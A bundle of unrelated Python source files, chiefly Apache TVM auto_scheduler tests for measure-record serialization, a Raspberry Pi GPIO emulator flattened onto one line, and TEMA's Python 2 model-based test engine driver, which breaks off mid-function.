            # Copy every output.wav file to the clips directory unprocessed
            # for a file that is 5 or fewer minutes long.
            for filename in os.listdir(self.wav_directory):
                if "output.wav" in filename:
                    dest_path = self.targetdirectory + "/" + "cut_stream" + filename[-11] + "_" + self.inputfile[:-4] + ".wav"
                    cleanup.copy_file(self.wav_directory + "/" + filename, dest_path)
test_auto_scheduler_measure.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.

""" Test measurement and log serialization. """

import json
import multiprocessing
import tvm
from tvm import topi
from tvm import te, auto_scheduler
import tempfile
import tvm.testing

from test_auto_scheduler_common import matmul_auto_scheduler_test, get_tiled_matmul


def record_common(dag, s):
    """Round-trip a (MeasureInput, MeasureResult) pair through both the
    in-memory string serializer and a record file, and check that the
    deserialized state infers to the same bounds as the original."""
    target = tvm.target.Target("llvm")
    task = auto_scheduler.SearchTask(compute_dag=dag, workload_key="test", target=target)

    inp = auto_scheduler.measure.MeasureInput(task, s)
    res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)

    # Test in-memory record processing.
    record_str = auto_scheduler.measure_record.dump_record_to_string(inp, res)
    r_inp, r_res = auto_scheduler.measure_record.load_record_from_string(record_str)
    # Only check the workload_key for simplification.
    assert inp.task.workload_key == r_inp.task.workload_key
    assert str(res) == str(r_res)

    # Test file-based record processing.
    with tempfile.NamedTemporaryFile() as fp:
        auto_scheduler.save_records(fp.name, [inp], [res])
        log_reader = auto_scheduler.RecordReader(fp.name)
        inputs, _ = log_reader.read_lines()
        assert len(inputs) == 1

        # The recorded state must round-trip to the same inferred bounds,
        # and must differ from the untouched initial state.
        s1 = dag.infer_bound_from_state(s)
        s2 = dag.infer_bound_from_state(inputs[0].state)
        assert s1 == s2
        assert not (s1 == dag.get_init_state())


def test_record_split_reorder_fuse_annotation():
    """Serialization coverage for split/reorder/fuse/annotation steps."""
    if not tvm.testing.device_enabled("llvm"):
        return

    A = te.placeholder((512, 512), name="A")
    B = te.placeholder((512, 512), name="B")
    k = te.reduce_axis((0, 512), name="k")
    C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")

    dag = auto_scheduler.ComputeDAG([A, B, C])
    s = dag.get_init_state()

    # Split
    its0 = s.split(C, s[C].iters[0], [4, 8, 8])
    its1 = s.split(C, s[C].iters[4], [8, 4, 4])
    # Reorder
    s.reorder(
        C, [its0[0], its1[0], its0[1], its1[1], its0[2], its1[2], its0[3], s[C].iters[8], its1[3]]
    )
    # Fuse
    s.fuse(C, [s[C].iters[0], s[C].iters[1], s[C].iters[2]])
    # Parallel
    s.parallel(C, s[C].iters[0])
    # Thread bind(The blockIdx & threadIdx are used in GPU, just for record testing here)
    s.bind(C, s[C].iters[1], "blockIdx.x")
    s.bind(C, s[C].iters[2], "threadIdx.z")
    s.bind(C, s[C].iters[3], "vthread")
    # Unroll
    s.unroll(C, s[C].iters[4])
    # Vectorize
    s.vectorize(C, s[C].iters[6])

    record_common(dag, s)


def test_record_compute_at_root_inline_cache_read_write():
    """Serialization coverage for compute_at/root/inline and cache steps."""
    if not tvm.testing.device_enabled("llvm"):
        return

    A = te.placeholder((512, 512), name="A")
    AA = topi.nn.relu(A)
    B = te.placeholder((512, 512), name="B")
    k = te.reduce_axis((0, 512), name="k")
    C = te.compute((512, 512), lambda i, j: te.sum(AA[i][k] * B[k][j], axis=[k]), name="C")

    dag = auto_scheduler.ComputeDAG([A, B, C])
    s = dag.get_init_state()

    # Cache Write
    C_shared = s.cache_write(C, "shared")
    # Compute At
    s.compute_at(C_shared, C, s[C].iters[0])
    # Cache Read
    B_global = s.cache_read(B, "global", [C_shared])
    s.compute_at(B_global, C_shared, s[C_shared].iters[2])
    # Compute Inline
    s.compute_inline(AA)
    # Compute Root
    s.compute_root(C_shared)

    record_common(dag, s)


def test_record_follow_split_follow_fused_split():
    """Serialization coverage for follow_split / follow_fused_split steps."""
    if not tvm.testing.device_enabled("llvm"):
        return

    A = te.placeholder((512, 512), name="A")
    B = te.placeholder((512, 512), name="B")
    k = te.reduce_axis((0, 512), name="k")
    C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
    D = topi.nn.relu(C)
    E = topi.nn.relu(D)

    dag = auto_scheduler.ComputeDAG([A, B, E])
    s = dag.get_init_state()

    # Follow Split
    s.split(C, s[C].iters[0], [4, 2, 8, 4], True)
    split_step0 = len(s.transform_steps) - 1
    s.follow_split(C, s[C].iters[5], split_step0, 4)
    # Follow Fused Split
    its0 = s.split(E, s[E].iters[0], [4, 2, 8, 4], True)
    split_step1 = len(s.transform_steps) - 1
    its1 = s.split(E, s[E].iters[5], [2, 4, 2, 4], True)
    split_step2 = len(s.transform_steps) - 1
    # Interleave the two split results, then fuse adjacent pairs.
    its = []
    for i0, i1 in zip(its0, its1):
        its.append(i0)
        its.append(i1)
    for i in range(0, 5):
        s.fuse(E, [s[E].iters[i], s[E].iters[i + 1]])
    s.follow_fused_split(D, s[D].iters[0], [split_step1, split_step2], 2, True)

    record_common(dag, s)


def test_record_pragma_storage_align_rfactor():
    """Serialization coverage for pragma/storage_align/rfactor steps."""
    if not tvm.testing.device_enabled("llvm"):
        return

    A = te.placeholder((512, 512), name="A")
    B = te.placeholder((512, 512), name="B")
    k = te.reduce_axis((0, 512), name="k")
    C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")

    dag = auto_scheduler.ComputeDAG([A, B, C])
    s = dag.get_init_state()

    # Rfactor
    ko, _ = s.split(C, s[C].iters[2], [16])
    s.rfactor(C, ko, 2)
    # Pragma
    s.pragma(C, s[C].iters[0], "auto_unroll_max_step$64")
    # StorageAlign
    s.storage_align(C, s[C].iters[-1], 8, 4)

    record_common(dag, s)


def test_recover_measure_input():
    """A recorded MeasureInput must be recoverable, optionally with the
    state rebuilt from its transform steps."""
    task = auto_scheduler.SearchTask(
        func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
    )

    inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
    res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)

    with tempfile.NamedTemporaryFile() as fp:
        auto_scheduler.save_records(fp.name, [inp], [res])

        log_reader = auto_scheduler.RecordReader(fp.name)
        inputs, _ = log_reader.read_lines()
        assert len(inputs) == 1

        raw_inp = inputs[0]

        correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp)
        assert str(correct_inp.task.compute_dag) == str(inp.task.compute_dag)

        correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp, rebuild_state=True)
        assert str(correct_inp.state) == str(inp.state)


def test_workload_dis_factor():
    """Check the workload distance factor between compatible and
    incompatible workload keys."""
    calc = auto_scheduler.measure_record.calc_workload_dis_factor

    # Identical
    target_wkl_key = json.dumps(
        ["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "float32"]
    )
    assert calc(target_wkl_key, target_wkl_key) == 1

    # Compatible with a factor
    wkl_key = json.dumps(["func1", [1, 3, 112, 112], [32, 3, 3, 3], [0, 0], [1, 1], "float32"])
    assert calc(target_wkl_key, wkl_key) == 8 * 2 * 2

    # Incompatible argument with zeros
    wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [1, 1], [1, 1], "float32"])
    assert calc(target_wkl_key, wkl_key) == float("inf")
    wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [0, 0], "float32"])
    assert calc(target_wkl_key, wkl_key) == float("inf")

    # Incompatible non-integter argument
    wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "int8"])
    assert calc(target_wkl_key, wkl_key) == float("inf")

    # Incompatible function
    wkl_key = json.dumps(["func2", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "float32"])
    assert calc(target_wkl_key, wkl_key) == float("inf")

    # Incompatible due to non-dividable factor
    wkl_key = json.dumps(["func1", [8, 3, 223, 223], [32, 3, 3, 3], [0, 0], [1, 1], "float32"])
    assert calc(target_wkl_key, wkl_key) == float("inf")


def test_measure_local_builder_runner():
    """Build and run a trivial schedule with LocalBuilder + LocalRunner."""
    if not tvm.testing.device_enabled("llvm"):
        return

    task = auto_scheduler.SearchTask(
        func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
    )

    for enable_cpu_cache_flush in [True, False]:
        minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
        local_builder = auto_scheduler.LocalBuilder()
        local_runner = auto_scheduler.LocalRunner(
            timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
        )

        bress = local_builder.build([minp])
        assert bress[0].error_no == 0
        mress = local_runner.run([minp], bress)
        assert mress[0].error_no == 0


def test_measure_local_builder_rpc_runner():
    """Build locally and run through the local RPC measure context."""
    if not tvm.testing.device_enabled("llvm"):
        return

    task = auto_scheduler.SearchTask(
        func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
    )

    for enable_cpu_cache_flush in [True, False]:
        minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
        local_builder = auto_scheduler.LocalBuilder()
        measure_ctx = auto_scheduler.LocalRPCMeasureContext(
            timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
        )
        rpc_runner = measure_ctx.runner

        bress = local_builder.build([minp])
        assert bress[0].error_no == 0
        mress = rpc_runner.run([minp], bress)
        assert mress[0].error_no == 0

    # Explicitly release the RPC tracker/server started by the context.
    del measure_ctx


def measure_local_builder_rpc_runner_spawn():
    # Runs inside a spawned child process (see the test below).
    assert multiprocessing.get_start_method(False) == "spawn"
    test_measure_local_builder_rpc_runner()


@tvm.testing.requires_llvm
def test_measure_local_builder_rpc_runner_spawn():
    """The RPC runner must also work when the process start method is
    'spawn' instead of 'fork'."""
    ctx = multiprocessing.get_context("spawn")
    p = ctx.Process(target=measure_local_builder_rpc_runner_spawn)
    p.start()
    p.join()


@tvm.testing.requires_llvm
def test_measure_target_host():
    """target_host must survive a record save/load round trip."""
    task = auto_scheduler.SearchTask(
        func=matmul_auto_scheduler_test,
        args=(512, 512, 512),
        target="llvm",
        target_host="llvm -mtriple=aarch64-linux-gnu",
    )

    inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
    res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)

    with tempfile.NamedTemporaryFile() as fp:
        auto_scheduler.save_records(fp.name, [inp], [res])

        log_reader = auto_scheduler.RecordReader(fp.name)
        inputs, _ = log_reader.read_lines()
        assert len(inputs) == 1

        raw_inp = inputs[0]

        recovered_inp = auto_scheduler.measure.recover_measure_input(raw_inp)
        assert str(recovered_inp.task.target_host) == str(inp.task.target_host)


if __name__ == "__main__":
    test_record_split_reorder_fuse_annotation()
    test_record_compute_at_root_inline_cache_read_write()
    test_record_follow_split_follow_fused_split()
    test_record_pragma_storage_align_rfactor()
    test_recover_measure_input()
    test_workload_dis_factor()
    test_measure_local_builder_runner()
    test_measure_local_builder_rpc_runner()
    test_measure_target_host()
GPIO.py
#! /usr/bin/env python3 # -*- coding: utf-8 -*- # ## ############################################################# # GPIO.py # # Author: Mauricio Matamoros # Licence: MIT # Date: # # ## ############################################################# # Future imports (Python 2.7 compatibility) from __future__ import absolute_import from __future__ import division from __future__ import print_function from time import time, sleep from threading import Thread from random import seed, randint # ## ############################################################# # Constants # ## ############################################################# LOW = 0x00 HIGH = 0x01 BCM = 0x00 BOARD = 0x01 OUT = 0x01 IN = 0x00 # End constants _io_mode = BCM _pin_map = { #BOARD : BCM/GPIO 3 : 2, 5 : 3, 7 : 4, 8 : 14, 10 : 15, 11 : 17, 12 : 18, 13 : 27, 15 : 22, 16 : 23, 18 : 24, 19 : 10, 21 : 9, 22 : 25, 23 : 11, 24 : 8, 26 : 7, 27 : 0, 28 : 1, 29 : 5, 31 : 6, 32 : 12, 33 : 13, 35 : 19, 36 : 16, 37 : 26, 38 : 20, 40 : 21, } def _board2bcm(pin): return _pin_map.get(pin, -1) def _check_pin(pin): if not isinstance(pin, int): raise ValueError("pin number must be an integer") if pin < 0 or pin > 27: raise ValueError("Not an I/O pin") def setwarnings(flag): pass def setmode(mode): global _io_mode _io_mode = mode def setup(pin, io_mode, initial=LOW): if _io_mode == BOARD: pin = _board2bcm(pin) _check_pin(pin) _io_pins[pin].setup(io_mode, initial) def input(pin): if _io_mode == BOARD: pin = _board2bcm(pin) _check_pin(pin) return _io_pins[pin].value def output(pin, value): if _io_mode == BOARD: pin = _board2bcm(pin) _check_pin(pin) _io_pins[pin].value = value def cleanup(): for pwm in _pwms: pwm.stop() del pwm for pin in _io_pins: _io_pins[pin].setup(IN) class PWM: def __init__(self, channel, frequency): _pwms.append(self) self._thread = None self._running = False self._duty_cycle = 0 self._frequency = 1 if _io_mode == BOARD: channel = _board2bcm(channel) self._pin = _io_pins[channel] #end def def 
__del__(self): if self._thread is not None: self.stop() if _pwms is not None: for pwm in _pwms: if pwm is self: _pwms.remove(self) break #end def def _worker(self): self._running = True reset_time = 0 flank_time = 0 # run until stopped while self._running: now = int(time() * 1000) if now >= flank_time: self._pin.value = 0 if now >= reset_time: self._pin.value = 1 reset_time = int(now + 1000.0 / self._frequency) flank_time = int(now + self._duty_cycle * 10.0 / self._frequency) sleep(0.001) #end while #end def def start(self, dc): self.ChangeDutyCycle(dc) self._thread = Thread(target=self._worker) self._thread.start() #end def def stop(self): if self._thread is not None: self._running = False if self._thread.is_alive(): self._thread.join() self._thread = None #end def def ChangeFrequency(self, freq): if not isinstance(freq, int) or not isinstance(freq, float): raise ArgumentException("Invalid type") self._frequency = freq #end def def ChangeDutyCycle(self, dc): if dc < 0 or dc > 100: raise ArgumentException("dc out of range") self._duty_cycle = dc #end def #end class def _random_pin_value(): return randint(0, 2) class GPIO_PIN: def __init__(self, gpio_pin_num): self.gpio_pin_num = gpio_pin_num self._buffer = 0 self.setup(IN) def setup(self, io_mode, initial_value=LOW): self.io_mode = io_mode if self.io_mode is OUT: self.value = initial_value @property def value(self): return self._buffer @value.setter def value(self, value): self.write(value) def _dump(self, value): pass def read(self): return self._buffer def write(self, value): if self.io_mode is OUT: self._buffer = 1 if value else 0 def __repr__(self): if self.gpio_pin_num < 10: return 'GPIO 0{}'.format(self.gpio_pin_num) else: return 'GPIO {}'.format(self.gpio_pin_num) seed(time()) _pwms = [] _io_pins = {} for i in range(1, 28): _io_pins[i] = GPIO_PIN(i)
testengine.py
#!/usr/bin/env python
# Copyright (c) 2006-2010 Tampere University of Technology
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

# NOTE: this module is Python 2 code (print statements, `except X, e`,
# the `file()` builtin).

"""
Commandline arguments (example):

model: REQUIRED test model specification (lstsmodel or parallellstsmodel)

coverage: REQUIRED coverage module
    Note: If not given, the proper coverage module is guessed based on the
    coveragereq string. (for backwards compatibility)

coveragereq: REQUIRED coverage requirement in a language accepted by the
    coverage module.

coveragereq-args: arguments for coverage module

initmodels: models for initialising a test run. These models are executed
    before the execution of the main test model is started.

testdata: datafiles that should be used in testing. $(expression)$ in the
    transition labels of models will be replaced using the data.
    Use 'nodata' to disable testdata

guidance & guidance-args: test selection module and its arguments

adapter & adapter-args: test adapter (socketserveradapter and its
    arguments) and its arguments

logger & logger-args: logger module and its arguments

actionpp & actionpp-args: action name postprocessor through which the
    actions are passed just before being sent to the adapter.

verify-states:
    1: always executes all the encountered state verifications
    0 (default): no special treatment to state verifications

testengine --model=parallellstsmodel:gallerycalendar.pcrules \\
    --coverage='clparser' \\
    --coveragereq='actions .*fullscreen.*' \\
    --initmodels='lstsmodel:close-apps.lsts,parallellstsmodel:initmodel.pcrules'\\
    --testdata='file:calendardata.td,file:gallerydata.td' \\
    --guidance=gameguidance \\
    --guidance-args='lookahead:15,randomseed:42' \\
    --adapter=socketserveradapter \\
    --adapter-args='port:9090' \\
    --logger='fdlogger'
    --logger-args='targetfd:stdout,exclude:ParallelLstsModel'
    --actionpp='localspp'
    --actionpp-args='file:S60v3localization.csv,lang:fi'
    --stop-after=1h30m
"""

import sys
import getopt
import random
import os
import time
import threading
import re
import signal
import traceback

# Save pid so external tooling can signal/kill this engine run.
run_pid = file("__engine_pid", "w")
print >> run_pid, os.getpid()
run_pid.close()

# Commandline arguments:
ARG_MODEL="model"
ARG_COVERAGE="coverage"
ARG_COVERAGE_REQ="coveragereq"
# A better name for this arg might be
# 'coverage-args' instead of 'coveragereq-args'
# but sticking by this for now for backwards compatibility.
ARG_COVERAGE_ARGS="coveragereq-args"
ARG_INITMODELS="initmodels"
ARG_DATA="testdata"
ARG_GUIDANCE="guidance"
ARG_GUIDANCE_ARGS="guidance-args"
ARG_CONF_FILE="config"
ARG_ADAPTER="adapter"
ARG_ADAPTER_ARGS="adapter-args"
ARG_LOGGER="logger"
ARG_LOGGER_ARGS="logger-args"
ARG_ACTIONPP="actionpp" # Actionname post-processor
ARG_ACTIONPP_ARGS="actionpp-args"
ARG_STOP_AFTER="stop-after"
ARG_VERIFY_STATES="verify-states"

CMDLINE_ARGUMENTS=[ "%s" % a for a in
    (ARG_MODEL, ARG_DATA,
     ARG_COVERAGE, ARG_COVERAGE_ARGS, ARG_COVERAGE_REQ,
     ARG_INITMODELS, ARG_CONF_FILE,
     ARG_GUIDANCE, ARG_GUIDANCE_ARGS,
     ARG_ADAPTER, ARG_ADAPTER_ARGS,
     ARG_LOGGER, ARG_LOGGER_ARGS,
     ARG_ACTIONPP, ARG_ACTIONPP_ARGS,
     ARG_STOP_AFTER,
     ARG_VERIFY_STATES) ]

# arguments without default values are required in the command line
CMDLINE_DEFAULTS={
    ARG_COVERAGE: "",
    ARG_COVERAGE_ARGS: "",
    ARG_CONF_FILE: "",
    ARG_DATA: "",
    ARG_INITMODELS: "",
    ARG_GUIDANCE: "gameguidance",
    ARG_GUIDANCE_ARGS: "",
    ARG_ADAPTER: "socketserveradapter",
    ARG_ADAPTER_ARGS: "port:9090",
    ARG_LOGGER: "fdlogger",
    ARG_LOGGER_ARGS: "targetfd:stdout",
    ARG_ACTIONPP: "",
    ARG_ACTIONPP_ARGS: "",
    ARG_STOP_AFTER: "",
    ARG_VERIFY_STATES: "0"
}

def error(errmsg, errcode=1):
    """Print an error message to stderr and exit with `errcode`."""
    sys.stderr.write("%s: ERROR: %s\n" % (sys.argv[0], errmsg))
    sys.exit(errcode)

def print_traceback(fileobject=sys.stderr):
    # At the moment print only same traceback that we would get, if we
    # hadn't caught the exception.
    type, value, traceb = sys.exc_info()
    traceback.print_exception(type, value, traceb, file=fileobject)

class CallGuidance:
    """Callable wrapper that runs guidance.suggestAction in a worker
    thread so the caller can wait on it with a deadline (see
    TestEngine.run_test)."""
    def __init__(self, guidance_object, current_state):
        self.__object = guidance_object
        self.__from_here = current_state
        self.__ev = threading.Event()
        self.__ev.clear()
        self.__rval = []
        self.__ok = False

    def __call__(self):
        # Executed in the worker thread; the event is always set so a
        # waiter is released even if suggestAction raises.
        try:
            self.__rval[:] = [ self.__object.suggestAction(self.__from_here) ]
            self.__ok = True
        finally:
            self.__ev.set()

    def wait_value(self, limit):
        """Wait for the worker's value until absolute timestamp `limit`
        (0 or negative means wait without deadline). Raises SystemExit
        when no value was produced in time."""
        wait_time = None
        if limit > 0 :
            wait_time = limit - time.time()
        self.__ev.wait( wait_time )
        if self.__ok :
            return self.__rval[0]
        else:
            raise SystemExit

class TestEngine:
    """This one-method class is a class instead of a pure function because we
    want to use the same logging mechanism as in other classes: log method is
    plugged in by the Logger.listen method."""

    def set_stop_time(self, timestr):
        """Parse a '1h30m50s'-style duration and record the absolute wall
        clock time when run_test must stop (0.0 = run until coverage)."""
        # Determine time zone offset to UTC
        if time.localtime().tm_isdst:
            timezone = -time.altzone / 60 / 60.0
        else:
            timezone = -time.timezone / 60 / 60.0
        if timezone >= 0:
            timeoffset = "+" + str(timezone)
        else:
            timeoffset = str(timezone)
        self.log("Local time zone UTC%s" % timeoffset )

        if timestr!="":
            # Peel off the h / m / s components in order; whatever remains
            # after 's' is a syntax error.
            if 'h' in timestr:
                hours, timestr = timestr.split('h')
            else:
                hours = 0
            if 'm' in timestr:
                mins, timestr = timestr.split('m')
            else:
                mins = 0
            if 's' in timestr:
                secs, timestr = timestr.split('s')
            else:
                secs = 0
            try:
                if timestr:
                    raise Exception("Extra characters after seconds.")
                hours, mins, secs = int(hours), int(mins), int(secs)
            except Exception, e:
                self.log("Syntax error in stop time, use format 1h30m50s")
                raise Exception("Invalid time format.")
            self._stop_time = time.time() + secs + 60*mins + 3600*hours
            self.log("Test run will be stopped at %s"
                     % time.strftime("%F %T", time.localtime(self._stop_time)))
        else:
            self._stop_time = 0.0

    def run_test(self, testmodel, current_state, covreq, testdata, guidance, adapter, appchain, verifier=None):
        # FIXME: Should this be a class method?
        #
        # Main test loop: repeatedly (1) pick an action, (2) send keywords to
        # the SUT through the adapter, (3) check the observed action is legal
        # in the model, (4) take the transition -- until the stop time, full
        # coverage, a model deadlock, or an error.
        def handler(signum, frame):
            raise Exception("Signal %i received" % signum )

        # Signals we are catching
        signal.signal(signal.SIGTERM, handler)

        stepcounter=0

        # clean model cache after every 10000 executions.
        # some guidances may clean up the cache themselves
        # but even if they don't, make sure it's cleared once in a while
        # to avoid consuming too much memory.
        cacheClearanceInterval = 10000
        executionsSinceCacheClearange = 0

        self.log("Testing starts from state %s" % current_state)
        while (self._stop_time == 0.0 or time.time() < self._stop_time) and covreq.getPercentage()<1.0 and len(current_state.getOutTransitions())>0:
            stepcounter+=1
            # 1. Choose action to be executed
            # If verifier is set and it gives an action, we'll execute that.
            # Otherwise, guidance chooses the action to be executed.
            if verifier:
                verifying_action = verifier.getAction(current_state)
            else:
                verifying_action = None
            if verifying_action is None:
                if guidance.isThreadable():
                    # Run the guidance in a daemon thread so the stop
                    # deadline can interrupt a long suggestAction call.
                    guid = CallGuidance(guidance, current_state)
                    t = threading.Thread(target=guid)
                    t.setDaemon(True)
                    t.start()
                    try:
                        suggested_action = guid.wait_value(self._stop_time)
                    except SystemExit:
                        break
                else:
                    suggested_action=guidance.suggestAction(current_state)
            else:
                suggested_action = verifying_action

            self.log("Step : %5i Covered: %7.4f %% Next: %s" % \
                (stepcounter, covreq.getPercentage()*100.0, suggested_action))

            # 2. Evaluate testdata, communicate with the SUT, if necessary
            if suggested_action.isKeyword():
                # Keywords cause communication
                try:
                    # force keyword to be positive (without '~')
                    # before sending
                    if suggested_action.isNegative():
                        sent_action_name=suggested_action.negate()
                    else:
                        sent_action_name=suggested_action.toString()
                    #adapter._set_current_state_UGLY_HACK(current_state)
                    result=adapter.sendInput(
                        appchain.process(
                            testdata.processAction(sent_action_name)))
                except AdapterError,e:
                    self.log("Adapter error, cannot continue: %s" % e)
                    return "Adapter error: %s" % e
                # Map the SUT's True/False result back to the positive or
                # negated form of the keyword actually observed.
                if suggested_action.isNegative():
                    if result==True:
                        executed_action_name=suggested_action.negate()
                    else:
                        executed_action_name=suggested_action.toString()
                else:
                    if result==True:
                        executed_action_name=suggested_action.toString()
                    else:
                        executed_action_name=suggested_action.negate()
            else:
                # Action is not a keyword => no communication
                executed_action_name=suggested_action.toString()
                testdata.processAction(executed_action_name)

            # 3. Check that we can execute executed_action_name also in
            # the model
            possible_transitions=[ t for t in current_state.getOutTransitions() \
                if t.getAction().toString()==executed_action_name ]
            # TBD: the line above seems/seemed to not find any actions sometimes
            # (when there's only the ~ version of the action possible?) ??
            # would this line be better??
            #possible_transitions=[ t for t in current_state.getOutTransitions() \
            #    if t.getAction().toString()==str(suggested_action)]
            if possible_transitions==[]:
                # Model can not execute the required action =>
                # *** error found ***
                self.log("Error found: cannot execute '%s' in the model" % executed_action_name)
                try:
                    if hasattr(adapter,"errorFound"):
                        adapter.errorFound()
                except AdapterError,e:
                    self.log("Adapter error when it was being informed about an error: %s" % e)
                self.log("Shutting down the adapter")
                try:
                    adapter.stop()
                except AdapterError,e:
                    self.log("Adapter error when tried to quit the connection: %s" % e)
                self.log("Verdict: FAIL")
                return "Error found: cannot execute '%s' in model state %s." % \
                    (executed_action_name, current_state)

            # 4. Execute the transition (if many, print warning on nondeterminism)
            chosen_transition=random.choice(possible_transitions)
            if len(possible_transitions)>1:
                print "Non determinism:",[str(t) for t in possible_transitions]
            self.log("Executing: %s" % chosen_transition.getAction())
            self.log("New state: %s" % chosen_transition.getDestState())
            # print stateprops only for every start_aw because there a so many
            # of them and printing them in every point would bloat the log...
            if "start_aw" in str(chosen_transition):
                self.log("(Non-SleepState) StateProps: %s" %
                    " ".join(['"%s"'%s for s in chosen_transition.getDestState().getStateProps() if "SleepState" not in str(s)] ))
            guidance.markExecuted(chosen_transition)
            if verifier:
                verifier.markExecuted(chosen_transition)
            current_state=chosen_transition.getDestState()

            executionsSinceCacheClearange += 1
            if executionsSinceCacheClearange >= cacheClearanceInterval:
                testmodel.clearCache()
                executionsSinceCacheClearange = 0
            # 5. Then loop.

        # Out of loop... decide the verdict from the loop's exit reason.
        result_comment="____ Undefined ____"
        if (self._stop_time > 0.0 and time.time() > self._stop_time):
            self.log("Time to stop")
            self.log("Verdict: PASS")
            result_comment = "Time to stop."
        elif covreq.getPercentage()<1.0:
            self.log("Cannot continue from state %s, no outgoing transitions." % current_state)
            # self.log("Verdict: INCONCLUSIVE")
            result_comment = "Deadlock reached in the test model."
        else:
            self.log("Required coverage acquired")
            self.log("Verdict: PASS")
            result_comment = "Coverage requirement fulfilled."

        self.log("Shutting down the adapter")
        try:
            adapter.stop()
        except AdapterError,e:
            self.log("Adapter error when tried to quit the connection: %s" % e)
        return result_comment

class ArgumentError (Exception):
    """Raised for missing or malformed command line arguments."""
    pass

def parse_arguments(arglist):
    """returns argument-value pairs in dictionary"""
    try:
        optlist,rest=getopt.getopt(arglist, [],
            [ "%s=" % a for a in CMDLINE_ARGUMENTS ])
        if rest!=[]:
            raise ArgumentError("Unable to parse argument '%s'" % str(rest[0]))
        retval={}
        retval.update(CMDLINE_DEFAULTS)
        for k,v in optlist:
            retval[k[2:]]=v # remove '--' in front of the option name
        # require that every argument has a value (either default or explicit)
        for k in CMDLINE_ARGUMENTS:
            if not k in retval:
                raise ArgumentError("Missing argument: --%s" % k)
        return retval
    except getopt.GetoptError,e:
        raise ArgumentError(e)

def import_tema_modules(options):
    # the following classes will be imported from libraries:
    global InitEngine, Model, Guidance, CoverageRequirement, TestData, Adapter, AdapterError, Logger

    # LastNameValue object will receive test model type and file name
    class LastNameValue:
        def setParameter(self,name,value):
            self.name,self.value=name,value

    try:
        from tema.initengine.initengine import InitEngine
        if options[ARG_COVERAGE]:
            # if coverage param given, import that coverage module
            coveragemodule=__import__("tema.coverage."+ options[ARG_COVERAGE], globals(),locals(),[''])
            CoverageRequirement = coveragemodule.requirement
        elif options[ARG_COVERAGE_REQ]:
            # otherwise, guess the coverage module from the coverage req string
            reqStr = options[ARG_COVERAGE_REQ].strip()
            if reqStr.startswith("action"):
                from tema.coverage.clparser import requirement\
                    as
CoverageRequirement elif reqStr.startswith("findnew"): from tema.coverage.findnewcoverage import requirement\ as CoverageRequirement else: from tema.coverage.altercoverage import requirement\ as CoverageRequirement else: # Neither coverage or coverage-req given. # Use dummy coverage module which shows always zero percentage. from tema.coverage.dummycoverage import CoverageRequirement if options[ARG_DATA] == "nodata" : from tema.data.nodata import TestData else: from tema.data.testdata import TestData # imported model module depends on the parameters... nv=LastNameValue() set_parameters(nv,options[ARG_MODEL]) # now nv.name = model module name, nv.value = model file name modelmodule=__import__("tema.model."+nv.name,globals(),locals(),['']) Model=modelmodule.Model Model.ARG_source_file=nv.value # Model will be loaded from source_file # imported guidance depends on the parameters... guidancemodule=__import__("tema.guidance."+options[ARG_GUIDANCE],globals(),locals(),['']) Guidance=guidancemodule.Guidance # imported adapter depends on the parameters... adaptermodule=__import__("tema.adapter."+options[ARG_ADAPTER],globals(),locals(),['']) Adapter=adaptermodule.Adapter AdapterError=adaptermodule.AdapterError # imported logger depends on the parameters... loggermodule=__import__("tema.logger."+options[ARG_LOGGER],globals(),locals(),['']) Logger=loggermodule.Logger except ImportError, e: error("import failed: '%s'. Is TemaLib in PYTHONPATH?" % e) except Exception, e: error("import failed: '%s'." % e) def set_parameters(object,argument_string): """Parse argument string and call setParameter-method of the object accordingly. 
